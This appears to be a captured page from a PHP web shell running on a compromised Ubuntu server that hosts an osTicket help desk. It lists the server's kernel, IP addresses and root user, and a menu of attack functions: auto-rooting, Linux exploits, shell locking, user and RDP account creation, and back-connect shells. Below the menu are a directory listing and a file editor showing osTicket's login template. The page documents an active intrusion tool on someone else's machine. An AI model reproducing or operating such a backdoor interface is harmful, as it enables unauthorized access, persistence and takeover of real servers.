Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
osticket /
upload /
include /
client /
[ HOME SHELL ]
Name
Size
Permission
Action
templates
[ DIR ]
drwxr-xr-x
accesslink.inc.php
2.19
KB
-rw-r--r--
edit.inc.php
863
B
-rw-r--r--
faq-category.inc.php
2.41
KB
-rw-r--r--
faq.inc.php
1.86
KB
-rw-r--r--
footer.inc.php
1003
B
-rw-r--r--
header.inc.php
7.8
KB
-rw-r--r--
kb-categories.inc.php
3.94
KB
-rw-r--r--
kb-search.inc.php
1.99
KB
-rw-r--r--
knowledgebase.inc.php
1.07
KB
-rw-r--r--
login.inc.php
2.55
KB
-rw-r--r--
open.inc.php
4.93
KB
-rw-r--r--
profile.inc.php
3.07
KB
-rw-r--r--
pwreset.login.php
960
B
-rw-r--r--
pwreset.request.php
913
B
-rw-r--r--
pwreset.sent.php
598
B
-rw-r--r--
register.confirm.inc.php
582
B
-rw-r--r--
register.confirmed.inc.php
652
B
-rw-r--r--
register.inc.php
3.15
KB
-rw-r--r--
tickets.inc.php
10.51
KB
-rw-r--r--
view.inc.php
8.37
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : login.inc.php
<?php if(!defined('OSTCLIENTINC')) die('Access Denied'); $email=Format::input($_POST['luser']?:$_GET['e']); $passwd=Format::input($_POST['lpasswd']?:$_GET['t']); $content = Page::lookupByType('banner-client'); if ($content) { list($title, $body) = $ost->replaceTemplateVariables( array($content->getLocalName(), $content->getLocalBody())); } else { $title = __('Sign In'); $body = __('To better serve you, we encourage our clients to register for an account and verify the email address we have on record.'); } ?> <h1><?php echo Format::display($title); ?></h1> <p><?php echo Format::display($body); ?></p> <form action="login.php" method="post" id="clientLogin"> <?php csrf_token(); ?> <div style="display:table-row"> <div class="login-box"> <strong><?php echo Format::htmlchars($errors['login']); ?></strong> <div> <input id="username" placeholder="<?php echo __('Email or Username'); ?>" type="text" name="luser" size="30" value="<?php echo $email; ?>" class="nowarn"> </div> <div> <input id="passwd" placeholder="<?php echo __('Password'); ?>" type="password" name="lpasswd" size="30" value="<?php echo $passwd; ?>" class="nowarn"></td> </div> <p> <input class="btn" type="submit" value="<?php echo __('Sign In'); ?>"> <?php if ($suggest_pwreset) { ?> <a style="padding-top:4px;display:inline-block;" href="pwreset.php"><?php echo __('Forgot My Password'); ?></a> <?php } ?> </p> </div> <div style="display:table-cell;padding: 15px;vertical-align:top"> <?php $ext_bks = array(); foreach (UserAuthenticationBackend::allRegistered() as $bk) if ($bk instanceof ExternalAuthentication) $ext_bks[] = $bk; if (count($ext_bks)) { foreach ($ext_bks as $bk) { ?> <div class="external-auth"><?php $bk->renderExternalLink(); ?></div><?php } } if ($cfg && $cfg->isClientRegistrationEnabled()) { if (count($ext_bks)) echo '<hr style="width:70%"/>'; ?> <div style="margin-bottom: 5px"> <?php echo __('Not yet registered?'); ?> <a href="account.php?do=create"><?php echo __('Create an account'); ?></a> </div> <?php } ?> <div> <b><?php echo __("I'm an agent"); ?></b> — <a href="<?php echo ROOT_PATH; ?>scp/"><?php echo __('sign in here'); ?></a> </div> </div> </div> </form> <br> <p> <?php if ($cfg->getClientRegistrationMode() != 'disabled' || !$cfg->isClientLoginRequired()) { echo sprintf(__('If this is your first time contacting us or you\'ve lost the ticket number, please %s open a new ticket %s'), '<a href="open.php">', '</a>'); } ?> </p>
Close